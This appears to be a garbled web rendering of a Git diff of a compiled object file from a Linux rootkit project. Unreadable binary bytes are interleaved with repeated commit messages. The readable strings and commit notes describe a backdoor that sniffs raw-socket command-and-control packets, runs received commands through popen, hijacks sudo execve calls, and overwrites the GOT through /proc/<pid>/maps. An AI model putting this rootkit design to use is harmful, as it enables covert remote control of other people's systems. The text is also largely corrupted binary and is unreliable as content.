.<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
/<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><00>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><00>
0<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><00>
,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
1<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>7,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>L,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>8<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?dD<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>N<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>*}92<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}<00>2<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
3<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/

<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

<00>
<00>
<00>)
.
3<
<00>C
9L
GS
<00>Z
<00>_
Dm
r
I<00>
<00><00>
|<00>
<00><00>
<00>
i<00>
<00><00>
<00><00>
<00><00>
i<00>
D<00>
<00>
<00>
%
U2
s?
{L
rY
<00>f
Vs
u<00>
<00><00>
<00><00>
<00><00>
<00><00>
<00>
M<00>
<00><00>
<00><00>
<00><00>
<00>
:
<00>
<00>)
<00>6
<00>C
"P
M]
<00>j
<00>w
<00><00>
<00><00>
<00><00>
<00>
]<00>
<00><00>
N<00>
<00><00>


<00>$
b1
7A
cX
<00>e
)r
&
<00><00>
<00><00>
1<00>
<00>
Z<00>
<00><00>
<00><00>
<00><00>
G<00>
<00>
m
24
89
<00>E
<00>Q
<00>]
<00>k
Ap
<00>|
<00><00>
F<00>
<00><00>
b<00>
<00>
<00><00>
#<00>
,<00>
<00>
 
b9
iS
8`
<00>m
<00>z
<00>
<00>
(<00>
<00><00>
+<00>
<00><00>
<00>
<00><00>
<00><00>
<00>
<00>
<00>/
0<
<00>V
Rc
<00>s
.<00>
<00>
<00>
<00>
<00>/
Q
[W
^
jk
	x
<00><00>
{<00>
]<00>
<00><00>
j<00>
<00><00><00><00>
<00>
v
<00>'
 99^<00>s
&<00><00>	<00><00>
<00>=	
<00>!	<00>8	
H	
vg	
<00>w	
<00>	
?<00>	
<00><00>	
l<00>	
<00>	
<00><00>	
<00><00>	<00>
<00>+

<00>;

{Y
<00>z


<00>

<00><00>

<00><00>
<00><00>

<00><00>

T<00>

<00>

s
0'<00>>
Z<00>
@<00><00>
<00><00>
z<00>
U
<00>
<00> @<00>`<00><00><00><00><00>.symtab.strtab.shstrtab.rela.text.data.bss.rodata.rela.debug_info.debug_abbrev.rela.debug_aranges.rela.debug_line.debug_str.comment.note.GNU-stack.note.gnu.property.rela.eh_frame @B
@<00>2
&<00>
,<00>
1<00>
<00>>i)9@<00>?J<00>2]<00>0X@<00>P0	q<00>;l@<00>P}0/$<00><00>0<00>*&<00>+<00>+ <00>8+<00><00>@Qx,<00>	<00>0<00><00>Q<00>
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								ELF>PR@@<00><1E>UH<55><48>H<EFBFBD><48>`dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00><00>E<EFBFBD><45>}<7D><>u
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>E<EFBFBD>H<>E<EFBFBD>H<>U<EFBFBD><55>E<EFBFBD><45><00><00><><EFBFBD><00><><EFBFBD>u<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>r<EFBFBD><00><00><00>E<EFBFBD><45>}<7D><>u<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>SH<53>E<EFBFBD>H<>E<EFBFBD>H<>UЋE<D08B><45><00><00><><EFBFBD><00><><EFBFBD>u<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>U<EFBFBD><55>E<EFBFBD><45><EFBFBD>H<EFBFBD>=<00><00><00>H<>M<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>0H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u.H<>=<00>H<><00>jH<6A><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD>H<><48>u<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>M<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>0dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u
-												Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version.

											
										
										
											2022-02-18 03:32:07 -05:00
+								<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>@H<><00>8<EFBFBD>H<><48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>M<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>@<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǅ<EFBFBD><C785><EFBFBD><EFBFBD><00>0<EFBFBD><30><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Hc<48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><02><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>Ή<EFBFBD><CE89><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Hc<48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01><0F><00><>u<EFBFBD><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD>ǅ<><C785><EFBFBD><EFBFBD><00><>ǅ<><C785><EFBFBD><EFBFBD><00>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD><14>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD><02><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>Ή<EFBFBD><CE89><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD><14>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<01><0F><00><>u<EFBFBD><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;<3B><><EFBFBD><EFBFBD><EFBFBD><0F>N<EFBFBD><4E><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
H<>5<00><><EFBFBD>H<>=<00>H<><48> <20><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48> <20><><EFBFBD>H<EFBFBD><48>u#<23><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>	H<>5<00><><EFBFBD><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48> <20><><EFBFBD>H<EFBFBD>pH<>E<EFBFBD><45>H<>¿<00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48>P<EFBFBD><50><EFBFBD>H<EFBFBD>u<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<>
QA<51>I<><49>H<EFBFBD>Ѻ(#<00>@H<><48><EFBFBD>H<><48>H<><48><08><>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD>h<EFBFBD><68><EFBFBD><EFBFBD><EFBFBD>`<60><><EFBFBD><EFBFBD><EFBFBD>X<EFBFBD><58><EFBFBD><EFBFBD><EFBFBD>P<EFBFBD><50><EFBFBD><EFBFBD>H<><48>0<EFBFBD><30>y0<79><30><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǅ<><C785><EFBFBD><EFBFBD><00><>H<>E<EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<>=<00>H<>E<EFBFBD>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48><08><><EFBFBD>H<EFBFBD>5<00><00>H<><48><08><><EFBFBD>H<EFBFBD><48><08><><EFBFBD><0F>OH<><48><08><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD><00><>uH<>=<00>ǅ<><C785><EFBFBD><EFBFBD><00>H<><48><08><><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48><08><><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><10><><EFBFBD><EFBFBD><00><00>H<><48><18><><EFBFBD>H<EFBFBD><48><18><><EFBFBD>H<EFBFBD>CC_MSG#H<>H<><48><10><><EFBFBD>H<EFBFBD><48><18><><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<>E<EFBFBD>H<EFBFBD>M<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><08><><18><><EFBFBD>A<EFBFBD>I<><49>H<EFBFBD>Ѻ(#<00>@H<><48><EFBFBD>H<><48>H<><48><08>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>H<><48>0<EFBFBD><30>y-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>OH<4F><48><18><><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><10><><EFBFBD>H<EFBFBD><48><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><0F>7<EFBFBD><37><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>H<>M<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48>AWAVAUATSH<53><48><EFBFBD><00>}<7D>H<EFBFBD>u<EFBFBD>H<EFBFBD><48>x<EFBFBD><78><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD>H<EFBFBD>=<00><00>E<EFBFBD><00>1<EFBFBD>E<EFBFBD>H<EFBFBD>H<EFBFBD><14>H<>E<EFBFBD>H<01>H<EFBFBD><10>E<EFBFBD><45><EFBFBD>H<EFBFBD>=<00><00><00>E<EFBFBD><01>E<EFBFBD>;E<>|<7C><><00><><0F><><00>E<EFBFBD><45><EFBFBD>Hc<48>H<EFBFBD><48>H<>U<EFBFBD>Hc<48>H<EFBFBD><48>`<60><><EFBFBD>Hǅh<C785><68><EFBFBD>Hc<48>H<EFBFBD><48>P<EFBFBD><50><EFBFBD>HǅX<C785><58><EFBFBD>H<>H<EFBFBD><14><00>H<><48>Hл<00>H<><48>Hk<48>H<><48>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><48>H)<29>H9<48>tH<><48>H<><48>$<24><00><>H<EFBFBD><EFBFBD><C281>H)<29>H<EFBFBD><EFBFBD><C281>H<><48>t%<25>H<><48>H<01>H<EFBFBD>H<><48>H<EFBFBD><48>H<><48>H<><48>H<>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>H<>H<>E<EFBFBD>H<EFBFBD>H<>PH<>E<EFBFBD>H<EFBFBD>H<>¾H<>=<00><00>H<>E<EFBFBD>H<EFBFBD>@H<>¾H<>=<00><00><00>E<EFBFBD><00>Y<EFBFBD>E<EFBFBD>H<EFBFBD>H<EFBFBD><14>H<>E<EFBFBD>HЋU<D08B><55><EFBFBD>H<>H<>E<EFBFBD>Hc<48>H<EFBFBD>ЋE<D08B><45>PH<>E<EFBFBD>Hc<48>H<EFBFBD>ЋU<D08B><55>JH<><EFBFBD>H<EFBFBD>=<00><00><00>E<EFBFBD><01>E<EFBFBD>;E<>|<7C><>E<EFBFBD><45>PH<>E<EFBFBD>Hc<48>H<EFBFBD><04>H<><48>x<EFBFBD><78><EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00><>yH<>=<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><00>E<EFBFBD><45>}<7D>yH<>=<00><00>}<7D><0F><><00><00><00><>H<EFBFBD>=<00><00><00><><00>BH<>=<00><00><00>E<EFBFBD><45>}<7D>yH<>=<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>E<EFBFBD><45><00><><EFBFBD><00><><EFBFBD>u0<75><00><00><>uH<>=<00><00>H<>=<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>U<EFBFBD>H<EFBFBD>M<EFBFBD><4D>E<EFBFBD>H<EFBFBD>Ή<EFBFBD><CE89>H<>=<00><00><00><00>E<EFBFBD>H<EFBFBD><48>H<EFBFBD><48>Hc<48>H<EFBFBD><48>H<>U<EFBFBD>Hc<48>I<EFBFBD><49>A<EFBFBD>Hc<48>I<EFBFBD><49>A<EFBFBD>H<>H<EFBFBD><14><00>H<><48>Hо<00>H<><48>Hk<48>H<><48>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><48>H)<29>H9<48>tH<><48>H<><48>$<24><00><>H<EFBFBD><EFBFBD><C281>H)<29>H<EFBFBD><EFBFBD><C281>H<><48>t%<25>H<><48>H<01>H<EFBFBD>H<><48>H<EFBFBD><48>H<><48>H<><48>H<>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>PH<>E<EFBFBD>H<EFBFBD>H<>E<EFBFBD>H<EFBFBD>H<><48><EFBFBD>H<>5<00><00><00><00>E<EFBFBD><00>`<60>E<EFBFBD>H<EFBFBD>H<EFBFBD><48>H<><14>H<>E<EFBFBD>HЋU<D08B><55><EFBFBD>H<>H<>E<EFBFBD>Hc<48>H<EFBFBD>ЋE<D08B><45>PH<>E<EFBFBD>Hc<48>H<EFBFBD>ЋU<D08B><55><EFBFBD>H<><48>H<EFBFBD>5<00><00><00><00>E<EFBFBD><01>E<EFBFBD><45><EFBFBD>9E<39>|<7C><>E<EFBFBD><45>P<EFBFBD>H<EFBFBD>E<EFBFBD>Hc<48>H<EFBFBD><04>H<>E<EFBFBD>H<EFBFBD><48>H<>H<><48>x<EFBFBD><78><EFBFBD>H<EFBFBD>M<EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD><00><>yH<>=<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>H<>=<00><00>H<><48>H<EFBFBD>]<5D>dH+%(t<05>H<>e<EFBFBD>[A\A]A^A_]<5D>Timer %i started, address sent %llx
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								rFailed to run commandCOMMAND ERRORRESULT OF COMMAND: %s
-												Added locking mechanism for execve_hijack. Incorporated new library rawtcp with latest version without bug.

											
										
										
											2022-04-14 13:24:43 -04:00
-												Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted

											
										
										
											2022-02-18 09:08:54 -05:00
+								Sniffing...
-												Added locking mechanism for execve_hijack. Incorporated new library rawtcp with latest version without bug.

											
										
										
											2022-04-14 13:24:43 -04:00
+								Running hijacking processCC_SYNFailed to open rawsocket
-												Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper

											
										
										
											2022-02-19 11:57:32 -05:00
+								Sniffed
-												Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted

											
										
										
											2022-02-18 09:08:54 -05:00
+								IP: %s
-												Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version.

											
										
										
											2022-02-18 03:32:07 -05:00
+								CC_ACKCC_MSG#Received client message#CC_FINConnection closed by requestReceived request: %s
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								Hello world from execve hijackerArgument %i is %s
-												Added forked routine to execve_hijack. Improved argv modification and made it work. Working now.

											
										
										
											2022-04-13 08:57:33 -04:00
+								sudo/home/osboxes/TFG/src/helpers/execve_hijackexecve ARGS%i: %s
 								/usr/bin/sudoFailed to execve()Fork failedI am the child with pid %d
-												Added locking mechanism for execve_hijack. Incorporated new library rawtcp with latest version without bug.

											
										
										
											2022-04-14 13:24:43 -04:00
+								/tmp/rootlogFailed to open lock file before entering hijacking routinelock file was lockedError with the lockfileChild process is exitinghijacking ARGS%i: %s
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								Failed to execve() originally hijacked processparent process is exiting%B
<02>9&I(Pint*@-9<03><19><03><1B><03>}<03><1A><03><1B><03>!<21><08><07><00>1<08>	3}	6	<09>	7	<09>	8	<09>	9	<09> 	:	<09>(	;	<09>0	<	<09>8	=	<09>@	@	<09>H	A	<09>P	B	<09>X	D<16>`	F<14>h	H}p	I}t	J<0B>x	MP<00>	NW<00>	O<08><00>	Q<0F><00>	Y
<0A><00>	[<17><00>	\<19><00>	]<14><00>	^	G<00>	_
 								-<00>	`}<00>	b<08><00><19>
 								+<08><08><0C><00>
9<08><08><08><0C><00>
9M<13><08>a<11><12>
 								>		<0C>		<15><08>tm8
 								<08>
 									}
-												Added extraction of original jump instruction and opcodes

											
										
										
											2022-03-15 18:36:59 -04:00
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								}
 								}
 								}
 }
 								}
 								}
 								}
 								}
 								<0C>(
 								<0F>0<08>
 									*><0C>1
9
^
q
<14>
<14>P<08>	!o b<08>	d	<09>	e
 								E	f}	g}	h
 								E,<08>ihl/@0@tos7
8	8Did9D	:Dttl;
8	<
8		=D
 									>P	?P]Pf%	hD	iD	j
 								<EFBFBD>	k
 								<EFBFBD>m
 n
 	t
 
	{D	|D	}D	<11>D	<11>Dseq<11>P	<11>P<11>D<11>Dfin<11>Dsyn<11>Drst<11>Dpsh<11>Dack<11>Durg<11>D<11>D	<11>D	<11>D	<11>Dd.<14>%bB@](<10>	<13>		<14>
 								<0B>		}	<0B> <08>.
]<01>}J<01><><01>}<03><>~<01>E<03><>~<01>(E<03><>~pid<01><0B><03><><0B><04><>B]ii<01>
}<03><><00><00><01>	<04><>jii<01>}<03><><00><00>fd<01>
}<03><>tii
}<03><><0C>	 9<04><><0C>	 9<04><>q}6<01><>
 								q"}<03><>}q.E<03><>}!fdq:}<03><>}s
 								<03><>}t<11>
 								<03><>}x<0B><03><>}iiz	}<03><>}<01><0E><03><>~<01><0B><03><>}<01>
 								!<02>P<01><0E><03><>~<01>	}<03><>}<00>
 								jj<01>
}<03><>}<00><01><12><03><>~<01><0F><03><>}p<01><0F><03><>}res<01><17><03><>~<01><17><03><>~<01><1A><03><>K"Y<07><00><01>Z
 								<03><>}[<0B><03><>}\<03><>}]	}<03><>}<0C>
9<00><08>D<07><00><01>}D<1D><03><>wfpE<0B><03><>wresF<0B><03><>wbufG
 								}<03><>w<0C><00>#9<00>$ }<00><01>"<17><03><>""<22><02>@%#	}fd#}<03><>fd2#}<03><>now$<02>@&exp%\%%\&s&
<0A>%:;9I$>$>I&I:;9	
:;9I8
 								:;9<I
!I/:;9
:;9I
8
:;9I
8
:;9I8:;9:;9
I
I8>I:;9(.?:;9'I@<18>B:;9I4:;9I4:;9I4:;9I4:;9I !I/!:;9I".?:;9I@<18>B#!I/$.?:;9I@<18>B%4:;9I&4:;9I,B
7<00><01>
/usr/lib/gcc/x86_64-linux-gnu/10/include/usr/include/x86_64-linux-gnu/bits/usr/include/x86_64-linux-gnu/bits/types/usr/include/usr/include/x86_64-linux-gnu/sys/usr/include/asm-generic/usr/include/netinetlibexecve_hijack.cstddef.htypes.hstruct_FILE.hFILE.hstdio.htypes.htime_t.hstruct_timespec.hstruct_tm.hstruct_itimerspec.hint-ll64.hstdint-uintn.hin.hnetdb.hip.htcp.hRawTCP.htimerfd.h!	<01>
 									<09>!g"<22>#<23>	<09>tYv!g#v$<24>	<09>tYw<08>Y<06>%wX<11>
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								[<08>	<09><10>	<09><08>
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<08>[<08><0C>u<06>w<><16>\<08>	<09><12>Y	<09>=<3D>!<21><<05>"u=["<05><10>Y	Z
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								<EFBFBD>	/<1A>	<09>Kr.
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<N
<08><05>Y<0E>/
<08><1F>
JKr<08><0F><	N z<08>t	 <08><08><17>Yt	Y<08><05><08> tJY<08>@+	K<08><10>	<09>
 								<EFBFBD>Y	/<0F>
<0A><08>u<10>XK"<22><11><08>%YY='<08>;<08>K<08><1C>v<>
 								h<><1D>!<0C>Y<06>/w&<05>
<0A>t//	<<08>J<08>X<01><01><02><01>	<01><08><08>	t/<f<8<03>
f"'	J<12>f<0C><08>
K<>	<09><11><08>	g<08>	<09>6Z	X1<08>
g<><67><0C>YtY<>
<0A>	<09>=<3D><05><0B><02><05>
%t/tf<F<03>	f *Jf\f<13><08><08>	K<><05><><0B><01>#__off_tshort int_IO_read_ptr_chaintm_hourdoffsize_t_shortbuf__uint8_tssize_t_IO_buf_baselong long unsigned intnew_value2th_urp_codecvtexecve_hijack.clong long intsigned charGNU C17 10.3.0 -mtune=generic -march=x86-64 -g -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection_fileno_IO_read_endtot_lenpacket_thostnamelong intres1check_flags_wide_dataenvp_cur_columnhostentuint16_t_old_offset_offsetmainnew_value__uint32_tgetLocalIpAddresshost_entrytimeinfores2_IO_markerth_sporttm_yearunsigned ints_addr_freeres_bufcommandh_namefrag_off_IO_write_ptrtm_monpacket_ackrawtimetm_isdst__ssize_tit_interval_IO_save_baseh_addrtypewindow_lock_flags2_modeurg_ptr__uint64_tversionTFD_TIMER_CANCEL_ON_SEThij_argstm_minsourcetv_nsectimestritimerspecack_seqtm_ydaytv_sec__syscall_slong_tpayload_IO_write_enduint64_tth_wintcpheader_IO_lock_tlong unsigned int_IO_FILEdestpacket/home/osboxes/TFG/src/helpersth_offtime_tipheadertcphdrh_aliasesh_lengthh_addr_listprotocol_Boolunsigned charmax_exppayload_lengthlocal_ip_IO_buf_endsaddrconnection_close__pid_tth_flags_IO_wide_datain_addr_ttimespec_vtable_offsetiphdrFILEhostbuffer_markersth_ackpacket_respayload_buftm_wdaytcp_seqargsth_seq__u64long doublechar__uint16_tIPbuffer_IO_codecvt__off64_t_IO_read_basetot_exp_IO_save_endshort unsigned inttm_mdayth_sum__pad5__time_t_unused2tm_sectm_zoneth_dportuint8_t_IO_backup_baseremote_ipdaddrth_x2argcpid_t_freeres_listexecute_commandtest_time_values_injectionTFD_TIMER_ABSTIMEit_valueargv_IO_write_basehijacker_process_routineuint32_ttm_gmtoffin_addrGCC: (Ubuntu 10.3.0-1ubuntu1) 10.3.0GNU<00>zRx<08><00>E<10>C
<02><<00>E<10>C
<02>\<00>E<10>C
<02>|6E<10>C
-,<00>JE<10>C
P<><03><04><05><06>1<00><>
<00>,BQahy<00><00><00><00><00><00><00><00><00><00><00><00><00><00><00><00><00><00>6
 								":DZ<00>ipw|<00><00>J<00><00><00><00><00><00><00><00><00><00>execve_hijack.ctest_time_values_injection_GLOBAL_OFFSET_TABLE_timerfd_createtimerfd_settimeprintf__stack_chk_failexecute_commandcallocpopenputsstrcatfgetspclosegetLocalIpAddressgethostnameexitgethostbynameinet_ntoastrcpyhijacker_process_routinelocaltimeasctimewriterawsocket_sniff_patterninet_ntopbuild_standard_packetrawsocket_sendstrtokstrcmpfreeflockmaingeteuidexecveperrorforksetsidgetpid__errno_locationsyslogwait&
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>a<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
